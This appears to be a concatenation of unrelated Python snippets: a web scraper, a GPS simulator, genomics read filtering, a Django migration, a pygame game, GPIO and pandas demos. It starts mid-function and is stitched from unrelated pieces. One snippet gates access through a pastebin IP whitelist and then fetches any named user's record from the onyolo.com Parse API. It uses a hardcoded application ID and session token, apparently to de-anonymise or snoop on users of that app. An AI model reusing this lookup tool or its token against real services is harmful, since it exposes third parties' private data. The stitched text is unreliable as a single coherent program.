req.add_header('X-LLNW-Security-Principal', username)
req.add_header('X-LLNW-Security-Timestamp', timestamp)
req.add_header('X-LLNW-Security-Token', token)
response = urllib2.urlopen(req)
return response
|
#single page crawl
import scrapy
import logging
from scrapy.contrib.spiders import Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from scrapy import Request, Spider
from scrapy.exceptions import CloseSpider
from scrapy.selector import Selector
from scrapy.item import Item, Field
class ScrapySampleItem(Item):
title = Field()
link = Field()
desc = Field()
price = Field()
image = Field()
class StackOverflowSpider(scrapy.Spider):
name = 'lekian others'
start_urls = ["http://www.lekiaan.com/categories/storage/cid-CU00204280.aspx", "http://www.lekiaan.com/categories/display/cid-CU00204288.aspx","http://www.lekiaan.com/categories/mirrors/cid-CU00204296.aspx","http://www.lekiaan.com/categories/accessories/cid-CU00204298.aspx","http://www.lekiaan.com/categories/television-units/cid-CU00262438.aspx","http://www.lekiaan.com/categories/chairs/cid-CU00273640.aspx"]
def parse(self, response):
for href in response.css('.bucket_left a::attr(href)'):
full_url = response.urljoin(href.extract())
logging.info(full_url)
yield scrapy.Request(full_url, callback=self.parse_product,dont_filter = True)
def parse_product(self, response):
items = []
item = ScrapySampleItem()
item['title'] = response.css('h1::text').extract_first()
item['image'] = response.css('.product-largimg::attr(src)').extract_first()
item['desc'] = response.css('.product_desc p::text').extract()
item['price'] = response.css('.sp_amt::text').extract_first()
if not item['desc']:
logging.info("EMPTY RECIEVED")
item['desc'] = response.css('h1::text').extract_first()
item['link'] = response.url
items.append(item)
for item in items:
yield item |
import os
import random
import asyncio
import aiohttp
num_of_drivers = int(os.environ['DRIVER_NUMBER'])
time_interval = int(os.environ['POSITION_SEND_INTERVAL'])
service_host = os.environ['SERVICE_HOST']
def generate_position(driver_id):
return {
'driver_id': driver_id,
'latitude': round(random.uniform(49.767749, 49.896666), 6),
'longitude': round(random.uniform(23.906237, 24.116664), 6),
'speed': random.randint(0, 120),
'altitude': random.randint(250, 450)
}
async def send_position(session, position):
async with session.post(f'{service_host}/positions', json=position) as resp:
text = await resp.text()
return resp.status, text
async def main():
while True:
async with aiohttp.ClientSession() as session:
tasks = [
send_position(session, generate_position(i))
for i in range(num_of_drivers)
]
await asyncio.gather(*tasks)
await asyncio.sleep(time_interval)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
|
"""Provides `ParamsManager` class for managing parameters folder."""
import os
import json
def _load(path):
with open(path, 'r') as f:
params = json.load(f)
return params
def _save(path, params):
with open(path, 'w') as f:
json.dump(params, f)
class ParamsManager(object):
"""A class for managering parameter sets."""
def __init__(self, folder, default_params=None, default_name=None):
"""
Initialize the manager.
Args:
folder: folder under which this manager loads/saves parameters.
default_params: default parameters. Can be None.
default_name: name of default params file. Only used if
default_params is None. Can be None.
"""
self._folder = folder
if default_params is None and default_name is not None:
default_params = self.load(default_name)
self._default_params = default_params
@property
def folder(self):
"""Get the model this manager looks for json files in."""
return self._folder
@property
def default_params(self):
"""Get default parameters for this manager."""
if self._default_params is None:
return None
return self._default_params.copy()
def load(self, model_name):
"""Load parameters for the specified model."""
path = self._path(model_name)
if not os.path.isfile(path):
raise IOError('No file at %s for model %s' % (path, model_name))
else:
return _load(path)
def _path(self, model_name):
return os.path.join(self._folder, '%s.json' % model_name)
def set_params(self, model_name, params, overwrite=False):
"""
Set parameters for the specified model.
Values of `default_params` for keys not in `params` are entered into
`params`.
Returns True if no params were present for the given model.
Returns False if params were present and were consistent.
Raises IOError if parameters already existed and `overwrite` is False
"""
if self._default_params is not None:
for k in params:
if k not in self._default_params:
raise Exception(
'key %s not in default_params keys. '
'Possible keys are %s' %
(k, str(list([k for k in self._default_params]))))
for k in self._default_params:
if k not in params:
params[k] = self._default_params[k]
path = self._path(model_name)
if os.path.isfile(path):
old_params = _load(path)
if old_params != params:
if not overwrite:
raise Exception('params already exist and are different.')
else:
_save(path, params)
return False
else:
if not os.path.isdir(self._folder):
os.makedirs(self._folder)
_save(path, params)
return True
|
'''
Created on Mar 11, 2016
@author: s3cha
'''
import os
import sys
import cPickle as pickle
import pysam
# input_bam_filename = "/media/s3cha/MyBook/VU/bam/UNCID_1580578.35e535d8-7265-4271-a503-5e1728cd5209.sorted_genome_alignments.bam"
# s = open('/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/temp_unmapped_read_list2.txt','w')
class ReadTrackAndFilter(object):
def __init__(self):
self.bam_filename = ''
self.read_tracked_filename = ''
self.p_filename = ''
self.read_length = 76
self.average_quality_threshold = 25
self.quality_threshold = 10
self.is_trackingmappedread = True
self.vdj_ref_folder = ''
self.sam_file = None
self.Kmer = 19
def set_Kmer(self,kmer):
self.Kmer = kmer
def set_Bamfilename(self,filename):
self.bam_filename = filename
def set_readtrackfilename(self,read_tracked_filename):
self.read_tracked_filename = read_tracked_filename
def set_pfilename(self,p_filename):
self.p_filename = p_filename
def set_mapreadtrack(self,check):
self.is_trackingmappedread = check
def set_qualitythreshold(self,threshold):
self.quality_threshold = threshold
def set_averagequalitythreshold(self,threshold):
self.average_quality_threshold = threshold
def get_ReverseComplement(self,sequence):
map = {'G':'C','C':'G','T':'A','A':'T','N':'N'}
complement_seq = []
for index in range(len(sequence))[::-1]:
complement_seq.append(map.get(sequence[index]))
return ''.join(complement_seq)
def get_RefKmer(self,ref_filename,Kmer):
ref_seq = []
kmer_seq = {}
kmer_rc_seq = {}
for file in ref_filename:
f = open(file,'r')
for line in f:
if line.startswith('>'):
continue
ref_seq.append(line.strip().upper())
for index in range(len(line.strip())-Kmer):
cur_kmer = line[index:index+Kmer].upper()
kmer_seq[cur_kmer] = 0
rev_line = self.get_ReverseComplement(line.strip().upper())
for index in range(len(rev_line)-Kmer):
cur_kmer = rev_line[index:index+Kmer].upper()
kmer_rc_seq[cur_kmer] = 0
return [kmer_seq,kmer_rc_seq,ref_seq]
def LoadReference(self,Kmer):
if self.vdj_ref_folder == '':
reference_vfilename = '/home/s3cha/data/SpliceDB/create_ig_db/data/imgt_data/ig/func/human/human_IGHV.fa'
reference_dfilename = '/home/s3cha/data/SpliceDB/create_ig_db/data/imgt_data/ig/func/human/human_IGHD.fa'
reference_jfilename = '/home/s3cha/data/SpliceDB/create_ig_db/data/imgt_data/ig/func/human/human_IGHJ.fa'
reference_cfilename = '/home/s3cha/data/SpliceDB/create_ig_db/data/imgt_data/ig/func/human/human_IGHC_oneline.fa'
ref_filename = [reference_vfilename,reference_dfilename,reference_jfilename,reference_cfilename]
kmer_seq,kmer_rc_seq,ref_seq = self.get_RefKmer(ref_filename, Kmer)
return [kmer_seq,kmer_rc_seq,ref_seq]
def LoadReference_DNA(self,Kmer):
if self.read_tracked_filename == '':
raise ValueError('Unmapped read file name is not specified')
dna_chr14_filename = '/home/s3cha/s3cha/data/dna/human70/chr14_Homo_sapiens.GRCh37.70.dna.chromosome_formatted_chr14.trie'
f = open(dna_chr14_filename,'r')
dna_string = f.readline()
# ref_seq = dna_string[106032614:107288051]#[105566277:106879844]#106032614,107288051
ref_seq = dna_string[105566277:106879844]#106032614,107288051
ref_rc_seq = self.get_ReverseComplement(ref_seq[::-1])
kmer_seq = {}
kmer_rc_seq = {}
for index in range(len(ref_seq)-Kmer):
kmer_seq[ref_seq[index:index+Kmer]] = 0
kmer_rc_seq[ref_rc_seq[index:index+Kmer]] = 0
return [kmer_seq,kmer_rc_seq,ref_seq]
def TrackFilteredfile(self,Kmer,picklefilename): # find the read from the read_tracked_filename which has at least Kmer mapping to the reference
kmer_seq,kmer_rc_seq,ref_seq = self.LoadReference(Kmer)
print '# of reference sequence: ',len(ref_seq),', # of Kmer in the reference: ',len(kmer_seq)
ACGT = ['A','C','G','T']
kmer = Kmer
f = open(self.read_tracked_filename,'r')
filtered_read = []
for line in f:
line = line.strip()
for index in range(len(line)-kmer):
cur_kmer = line[index:index+kmer]
if kmer_seq.has_key(cur_kmer):
filtered_read.append(line)
break
elif kmer_rc_seq.has_key(cur_kmer):
filtered_read.append(self.get_ReverseComplement(line))
break
if picklefilename != '':
pickle.dump(filtered_read, open(picklefilename,'wb'))
return filtered_read
def CheckKmerMap(self,kmer_seq,kmer_rc_seq,read,Kmer):
check = False
read_seq = read.query_sequence
for i in range(len(read_seq)-Kmer):
cur_kmer = read_seq[i:i+Kmer]
if kmer_seq.has_key(cur_kmer):
return True
elif kmer_rc_seq.has_key(cur_kmer):
return True
return False
'''def TrackBamfile(self): #tracking the bam file (mapped read to reference region, and unmapped read) and save it to read_tracked_filename
if self.bam_filename == '':
raise ValueError("BAM file name is not specified")
if self.read_tracked_filename == '':
raise ValueError("Read output file name is not specified")
samfile = pysam.AlignmentFile(self.bam_filename,"rb")
###
write_samfile = pysam.AlignmentFile("/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/StefanoCompR/filtered_read_kmermap_imgtref.bam","wb",template=samfile)
###
mapped_read_count = 0
unmapped_read_count = 0
### trimming the 3' end of the read based on the quality value. input: quality scores as a list, output: index of position need to be trimmed
def Trim_read_index(quality,threshold):
index = self.read_length
if sum(quality[:5]) < 5*threshold: #filter the 3' if the first 5 entries has lower quality values.
return 0
for i in quality[::-1]: #trim the 5' end if the quality value is lower than threshold.
if i < threshold:
index -= 1
else:
break
return index
s = open(self.read_tracked_filename,'w')
read_length = self.read_length
threshold = self.average_quality_threshold * read_length
if self.is_trackingmappedread:
count = 0
# for read in samfile.fetch('chr14',106032614,107288051,until_eof=True):
for read in samfile.fetch('chr14',105566277,106879844,until_eof=True):
count += 1
quality = read.query_qualities
if sum(quality) < threshold:
continue
####
write_samfile.write(read)
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read_seq = read.query_sequence[:trim_index]
s.write(read_seq+'\n')
mapped_read_count += 1
print count
count = 0
for read in samfile.fetch(until_eof=True):
count += 1
if read.is_unmapped:
quality = read.query_qualities
####
write_samfile.write(read)
if sum(quality) < threshold:
continue
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read_seq = read.query_sequence[:trim_index]
s.write(read_seq+'\n')
unmapped_read_count += 1
print count
write_samfile.close()
s.close()
samfile.close()
return [mapped_read_count,unmapped_read_count]'''
'''def TrackBamfile_withFilter(self,Kmer,pfilename): #tracking the bam file (mapped read to reference region, and unmapped read) and save it to read_tracked_filename
if self.bam_filename == '':
raise ValueError("BAM file name is not specified")
if self.read_tracked_filename == '':
raise ValueError("Read output file name is not specified")
samfile = pysam.AlignmentFile(self.bam_filename,"rb")
###
# kmer_seq, kmer_rc_seq, ref_seq = self.LoadReference_DNA(Kmer)
kmer_seq, kmer_rc_seq, ref_seq = self.LoadReference(Kmer)
write_samfile = pysam.AlignmentFile("/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/StefanoCompR/filtered_read_kmermap_imgtrefer.bam","wb",template=samfile)
###
mapped_read_count = 0
unmapped_read_count = 0
### trimming the 3' end of the read based on the quality value. input: quality scores as a list, output: index of position need to be trimmed
def Trim_read_index(quality,threshold):
index = self.read_length
if sum(quality[:5]) < 5*threshold: #filter the 3' if the first 5 entries has lower quality values.
return 0
for i in quality[::-1]: #trim the 5' end if the quality value is lower than threshold.
if i < threshold:
index -= 1
else:
break
return index
s = open(self.read_tracked_filename,'w')
read_length = self.read_length
threshold = self.average_quality_threshold * read_length
filtered_read = []
if self.is_trackingmappedread:
count = 0
# for read in samfile.fetch('chr14',106032614,107288051,until_eof=True):
for read in samfile.fetch('chr14',105566277,106879844,until_eof=True):
quality = read.query_qualities
if sum(quality) < threshold:
continue
####
if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, Kmer):
count += 1
write_samfile.write(read)
else:
continue
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read_seq = read.query_sequence[:trim_index]
s.write(read_seq+'\n')
filtered_read.append(read_seq)
mapped_read_count += 1
print count
count = 0
for read in samfile.fetch(until_eof=True):
if read.is_unmapped:
quality = read.query_qualities
####
if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, Kmer):
count += 1
write_samfile.write(read)
else:
continue
if sum(quality) < threshold:
continue
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read_seq = read.query_sequence[:trim_index]
s.write(read_seq+'\n')
filtered_read.append(self.get_ReverseComplement(read_seq))
unmapped_read_count += 1
print count
write_samfile.close()
s.close()
samfile.close()
if pfilename != '':
print len(filtered_read)
pickle.dump(filtered_read,open(pfilename,'wb'))
return [mapped_read_count,unmapped_read_count]'''
'''def Test_input(self,Kmer,pfilename): #tracking the bam file (mapped read to reference region, and unmapped read) and save it to read_tracked_filename
if self.bam_filename == '':
raise ValueError("BAM file name is not specified")
if self.read_tracked_filename == '':
raise ValueError("Read output file name is not specified")
samfile = pysam.AlignmentFile(self.bam_filename,"rb")
###
# kmer_seq, kmer_rc_seq, ref_seq = self.LoadReference_DNA(Kmer)
kmer_seq, kmer_rc_seq, ref_seq = self.LoadReference(Kmer)
write_samfile = pysam.AlignmentFile("/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/StefanoCompR/filtered_read_kmermap_test.bam","wb",template=samfile)
###
mapped_read_count = 0
unmapped_read_count = 0
### trimming the 3' end of the read based on the quality value. input: quality scores as a list, output: index of position need to be trimmed
def Trim_read_index(quality,threshold):
index = self.read_length
# if sum(quality[:5]) < 5*threshold: #filter the 3' if the first 5 entries has lower quality values.
# return 0
for i in quality[::-1]: #trim the 5' end if the quality value is lower than threshold.
if i < threshold:
index -= 1
else:
break
return index
s = open(self.read_tracked_filename,'w')
read_length = self.read_length
threshold = self.average_quality_threshold
filtered_read = []
if self.is_trackingmappedread:
count = 0
# for read in samfile.fetch('chr14',106032614,107288051,until_eof=True):
for read in samfile.fetch('chr14',105566277,106879844,until_eof=True):
if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, Kmer):
count += 1
# write_samfile.write(read)
else:
continue
quality = read.query_qualities
if float(sum(quality))/read_length < threshold:
continue
write_samfile.write(read)
####
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
# if trim_index < read_length:
# print read.query_sequence
# sys.exit()
read.query_sequence = read.query_sequence[:trim_index]+'A'*(read_length-trim_index)
read_seq = read.query_sequence
# if trim_index < read_length:
#
# print read_seq
# print len(read_seq)
# sys.exit()
# write_samfile.write(read)
s.write(read_seq+'\n')
filtered_read.append(read_seq)
mapped_read_count += 1
print count
count = 0
for read in samfile.fetch(until_eof=True):
if read.is_unmapped:
quality = read.query_qualities
####
if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, Kmer):
count += 1
# write_samfile.write(read)
else:
continue
write_samfile.write(read)
if float(sum(quality))/read_length < threshold:
continue
trim_index = Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read.query_sequence = read.query_sequence[:trim_index] + 'A'*(read_length-trim_index)
read_seq = read.query_sequence
# write_samfile.write(read)
s.write(read_seq+'\n')
filtered_read.append(self.get_ReverseComplement(read_seq))
unmapped_read_count += 1
print count
write_samfile.close()
s.close()
samfile.close()
if pfilename != '':
print len(filtered_read)
pickle.dump(filtered_read,open(pfilename,'wb'))
return [mapped_read_count,unmapped_read_count]
'''
def Trim_read_index(self,quality,threshold):
index = self.read_length
for i in quality[::-1]: #trim the 5' end if the quality value is lower than threshold.
if i < threshold:
index -= 1
else:
break
return index
class ReadProcessor(object):
def __init__(self):
pass
def processRead(self,read):
raise NotImplementedError("Subclass should implement this")
pass
class SaveToText(ReadProcessor):
def __init__(self,text_filename):
self.s = open(text_filename,'w')
pass
def processRead(self,read):
self.s.write(read+'\n')
pass
class SdbnAddRead(ReadProcessor):
def __init__(self,sdbn,readclass):
self.sdbn = sdbn
self.readclass = readclass
pass
def processRead(self,read):
self.sdbn.AddRead(self.readclass,read)
pass
def SdbConstruction(self,sdbn,readclass):
processor = self.SdbnAddRead(sdbn,readclass)
self.BamfileProcessor(processor)
pass
def SaveReadToText(self,text_filename):
processor = self.SaveToText(text_filename)
self.BamfileProcessor(processor)
pass
def BamfileProcessor(self,read_processor):
if self.bam_filename == '':
raise ValueError("BAM file name is not specified")
samfile = pysam.AlignmentFile(self.bam_filename,"rb")
kmer_seq, kmer_rc_seq, ref_seq = self.LoadReference(self.Kmer)
mapped_read_count = 0
unmapped_read_count = 0
read_length = self.read_length
threshold = self.average_quality_threshold
if self.is_trackingmappedread:
count = 0
for read in samfile.fetch('chr14',105566277,106879844,until_eof=True):
if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, self.Kmer):
count += 1
else:
count += 1
continue
quality = read.query_qualities
if float(sum(quality))/read_length < threshold:
continue
trim_index = self.Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read.query_sequence = read.query_sequence[:trim_index]
read_seq = read.query_sequence
# filtered_read.append(read_seq)
# sdbn.AddRead(readclass,read_seq)
read_processor.processRead(read_seq)
mapped_read_count += 1
print 'Number of mapped reads: %d, Percent of reads filtered: %f '%(mapped_read_count,float(mapped_read_count)/count*100)
count = 0
for read in samfile.fetch(until_eof=True):
if read.is_unmapped:
quality = read.query_qualities
if self.CheckKmerMap(kmer_seq, kmer_rc_seq, read, self.Kmer):
count += 1
else:
count += 1
continue
if float(sum(quality))/read_length < threshold:
continue
trim_index = self.Trim_read_index(quality,self.quality_threshold)
if trim_index < read_length * 2 / 3:
continue
else:
read.query_sequence = read.query_sequence[:trim_index]
read_seq = read.query_sequence
# filtered_read.append(self.get_ReverseComplement(read_seq))
# sdbn.AddRead(readclass,self.get_ReverseComplement(read_seq))
read_processor.processRead(self.get_ReverseComplement(read_seq))
unmapped_read_count += 1
print 'Number of unmapped reads: %d, Percent of reads filtered: %f '%(unmapped_read_count,float(unmapped_read_count)/count*100)
samfile.close()
return [mapped_read_count,unmapped_read_count]
#105566277 and POS < 106879844
#106032614,107288051
# input_bam = '/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/StefanoCompR/filtered_read_kmermap_test.bam'
# x.TrackBamfile()
# x.TrackBamfile_withFilter(19,'/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/uncid/filtered_reads.p')
# x.TrackFilteredfile(19, '/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/uncid/filtered_reads.p')
if __name__ == '__main__':
print 123
input_bam = '/media/s3cha/MyBook/VU/bam/UNCID_1580578.35e535d8-7265-4271-a503-5e1728cd5209.sorted_genome_alignments.bam'
x = ReadTrackAndFilter()
x.set_Bamfilename(input_bam)
'''
input_bam = '/media/s3cha/MyBook/VU/bam/UNCID_1580578.35e535d8-7265-4271-a503-5e1728cd5209.sorted_genome_alignments.bam'
x = ReadTrackAndFilter()
x.set_Bamfilename(input_bam)
x.set_readtrackfilename('/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/temp_unmapped_read_list3.txt')
x.Test_input(19,'/home/s3cha/data/SpliceDB/NEW_IG_Graph/KmerTest/uncid/filtered_reads.p')
'''
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-08-13 07:07
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('viewflow', '0006_i18n'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='DailyTimesheet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('code', models.CharField(choices=[('absent', 'Absent'), ('present', 'Present'), ('weekend', 'Weekend'), ('holiday', 'Holiday'), ('paid_leave', 'Paid Leave'), ('unpaid_leave', 'Unpaid Leave'), ('sick_leave', 'Sick Leave'), ('business_trip', 'Business Trip')], default='present', max_length=20)),
('created_at', models.DateTimeField(auto_now=True)),
('payroll', models.FloatField(blank=True, null=True)),
('approval_status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved'), ('rejected', 'Rejected')], default='pending', max_length=20)),
('approved_at', models.DateTimeField(blank=True, null=True)),
('approved_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='timesheet_approvals', to=settings.AUTH_USER_MODEL)),
('requester', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sheets', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='DailyTimesheetApproval',
fields=[
('process_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='viewflow.Process')),
('sheet', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='approval', to='example.DailyTimesheet')),
],
options={
'abstract': False,
},
bases=('viewflow.process',),
),
migrations.CreateModel(
name='Vacation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_date', models.DateField()),
('end_date', models.DateField()),
('passport_expiry_date', models.DateField(blank=True, null=True)),
('requested_on', models.DateField(auto_now=True)),
('details', models.CharField(default='vacation', max_length=300)),
('approval_status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved'), ('rejected', 'Rejected')], default='pending', max_length=20)),
('approved_at', models.DateTimeField(blank=True, null=True)),
('request_details', models.BooleanField(default=False)),
('approved_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='vacation_approvals', to=settings.AUTH_USER_MODEL)),
('requester', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='vacations', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='VacationApproval',
fields=[
('process_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='viewflow.Process')),
('vacation', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='approval', to='example.Vacation')),
],
options={
'abstract': False,
},
bases=('viewflow.process',),
),
]
|
import socket,requests
hostname = socket.gethostname()
local_ip = socket.gethostbyname(hostname)
print(local_ip)
req = requests.get('https://pastebin.com/mRqFXTH9').text
if local_ip in req:
pass
else:
print("-------------------------------------")
print("Your Not Member Send The Id to Owner")
print("-------------------------------------")
print("Send The Id to Me Insta = Jev0m Telegram = Div0m")
exit()
import requests
import sys
print("""
/$$$$$
|__ $$
| $$ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$/$$$$
| $$ /$$__ $$| $$ /$$//$$__ $$| $$_ $$_ $$
/$$ | $$| $$$$$$$$ \ $$/$$/| $$ \ $$| $$ \ $$ \ $$
| $$ | $$| $$_____/ \ $$$/ | $$ | $$| $$ | $$ | $$
| $$$$$$/| $$$$$$$ \ $/ | $$$$$$/| $$ | $$ | $$
\______/ \_______/ \_/ \______/ |__/ |__/ |__/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Insta = @Jev0m
Telegram = @div0m
""")
user = input('User yolo dane -> ')
url = "http://onyolo.com/parse/classes/_User/"+user
payload = ""
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Parse-Installation-Id": "25cfde8f-7204-434e-a7fb-dde295ee4f70",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36",
"Connection": "close",
"X-Parse-Application-Id": "RTE8CXsUiVWfG1XlXOyJAxfonvt",
"Host": "onyolo.com",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"Accept-Language": "en-US,en;q=0.9",
"X-Parse-Client-Version": "i1.17.3",
"X-Parse-Session-Token": "r:d2387adf1745407f5ec19e7de61f2da1",
"X-Parse-OS-Version": "12.9 (saud)"
}
response = requests.request("GET", url, data=payload, headers=headers)
print(response.text)
|
import os, sys
from grid import Grid
import pygame
from pygame.locals import *
from shape import Shape
import copy
def main():
pygame.init()
screen = pygame.display.set_mode([300, 720])
white = 255, 255, 255
black = 0, 0, 0
purple = 155, 0, 155
cleared = []
current_shape = Shape()
grid = Grid()
lost = False
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == KEYDOWN:
if event.key == K_RIGHT:
current_shape.status = 'moveright'
if event.key == K_LEFT:
current_shape.status = 'moveleft'
if event.key == K_SPACE:
lost = False
elif event.type == KEYUP:
if event.key == K_RIGHT and current_shape.status == 'moveright':
current_shape.status = None
if event.key == K_LEFT and current_shape.status == 'moveleft':
current_shape.status = None
if not grid.is_valid(current_shape.status, current_shape): #check if proposed move is legal
current_shape.status = None
grid.move_down(cleared) #move down blocks if a row has been cleared
cleared = grid.row_check() #check for cleared rows
grid.clear_rows(cleared) #delete blocks from cleared rows
at_bottom = grid.collided_vert(current_shape) #check if the current shape can move down further
current_shape.at_bottom = at_bottom
current_shape.update() #move the current shape
if at_bottom: #shape can't go down further so add its blocks to the list of blocks
grid.add_blocks(current_shape.blocks)
current_shape = Shape()
if grid.collided_vert(current_shape):
lost = True
screen.fill(white)
for b in current_shape.blocks: #draw the current shape's blocks on the screen
pygame.draw.rect(screen, b.color, b, 0) #once for fill
pygame.draw.rect(screen, black, b, 1) #once for outline
for bk in grid.blocks: #draw all other blocks on the screen
pygame.draw.rect(screen, bk.color, bk, 0)
pygame.draw.rect(screen, black, bk, 1)
if lost:
font = pygame.font.Font(None, 50)
text = font.render("You lost!", 1, purple)
text_rect = text.get_rect(centerx=screen.get_width()/2, centery=screen.get_height()/2)
screen.fill(white)
screen.blit(text, text_rect)
grid = Grid()
current_shape = Shape()
pygame.display.update()
pygame.time.delay(200)
if __name__ == '__main__': main()
|
class Composition:
class __Other:
def __init__(self, string):
self.string = string
def retrieve_string(self):
return self.string
def result(self):
return self.__Other('Hello').retrieve_string() + ' world!'
composition = Composition()
print(composition.result())
class Other:
def __init__(self, string):
self.string = string
def retrieve_string(self):
return self.string
class Composition:
def __init__(self, string):
self.other_class = Other(string)
def result(self):
return self.other_class.retrieve_string() + ' world!'
composition = Composition('Hello')
print(composition.result())
class Aggregation:
def __init__(self, other_class):
self.other_class = other_class
def result(self):
return "Hello " + self.other_class.retrieve_string() + "!"
other = Other("world")
aggregation = Aggregation(other)
print(aggregation.result())
|
#!/usr/bin/env python
import RPi.GPIO as GPIO
import time
LIGHT1 = 23
LIGHT2 = 25
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(LIGHT1,GPIO.OUT)
GPIO.setup(LIGHT2, GPIO.OUT)
#GPIO.output(LIGHT1, GPIO.HIGH)
def drawLed():
GPIO.output(LIGHT2, GPIO.HIGH)
time.sleep(1)
GPIO.output(LIGHT2, GPIO.LOW)
time.sleep(1)
GPIO.output(LIGHT2, GPIO.HIGH)
time.sleep(1)
GPIO.output(LIGHT2, GPIO.LOW)
time.sleep(1)
GPIO.output(LIGHT2, GPIO.HIGH)
time.sleep(1)
GPIO.output(LIGHT2, GPIO.LOW)
time.sleep(1)
GPIO.output(LIGHT2, GPIO.HIGH)
time.sleep(1)
GPIO.output(LIGHT2, GPIO.LOW)
drawLed()
drawLed()
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
gender = ["Male","Female"]
income = ["Poor", "Middle Class", "Rich"]
gender_data = []
income_data = []
n = 500
for i in range (0, n):
gender_data.append(np.random.choice(gender))
income_data.append(np.random.choice(income))
height = 160 + 30 * np.random.randn(n)
weight = 65 + 25 * np.random.randn(n)
age = 30 + 12 * np.random.randn(n)
income = 18000 + 3500 * np.random.randn(n)
for j in range (0,len(age)):
age[j] = int(age[j])
income[j] = int(income[j])
data = pd.DataFrame(
{
'Gender' : gender_data,
'Economic Status' : income_data,
'Height' : height,
'Weight' : weight,
'Age' : age,
'Income': income
}
)
double_group = data.groupby(["Gender", "Economic Status"])
double_group.sum()
double_group.mean()
double_group.size()
double_group.describe()
double_group["Income"].sum()
x = double_group.aggregate(
{
"Income": np.sum,
"Age": np.mean,
"Height": lambda h: (np.mean(h) )/ np.std(h)
}
)
#x = double_group.aggregate([np.std,np.sum,np.mean])
#x = double_group.aggregate([lambda x: np.mean(x) / np.std(x)])
'''Filtrado'''
#print(double_group['Age'].filter(lambda x: x.sum()>2400))
'''Tranformacion de variables'''
zscore = lambda x : (x - x.mean())/x.std()
z_group = double_group.transform(zscore)
plt.hist(z_group['Age'])
plt.show()
'''
fill_na_mean = lambda x : x.fillna(x.mean())
double_group.transform(fill_na_mean)
'''
#double_group.head(1) devuelve la primer fila de cada grupo, tail para el ultimo
#double_group.nth(32) regresa el elemento seleccionado *no es df
'''Ordenado'''
data_sorted = data.sort_values(['Age', 'Income'])
data_sorted.head(10)
age_grouped = data_sorted.groupby('Gender') |
import os
import math
from datetime import datetime
from getpass import getuser
from sqlalchemy import create_engine, or_
from sqlalchemy.event import listen
from sqlalchemy.sql import select, func
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import OperationalError
from importlib import import_module
from contextlib import contextmanager
from paths import PEPYS_IMPORT_DIRECTORY
from pepys_import.resolvers.default_resolver import DefaultResolver
from pepys_import.utils.data_store_utils import import_from_csv
from pepys_import.utils.geoalchemy_utils import load_spatialite
from pepys_import.core.store import constants
from pepys_import.core.formats import unit_registry
from .db_base import BasePostGIS, BaseSpatiaLite
from .db_status import TableTypes
from pepys_import import __version__
from pepys_import.utils.branding_util import (
show_welcome_banner,
show_software_meta_info,
)
import pepys_import.utils.value_transforming_utils as transformer
import pepys_import.utils.unit_utils as unit_converter
from .table_summary import TableSummary, TableSummarySet
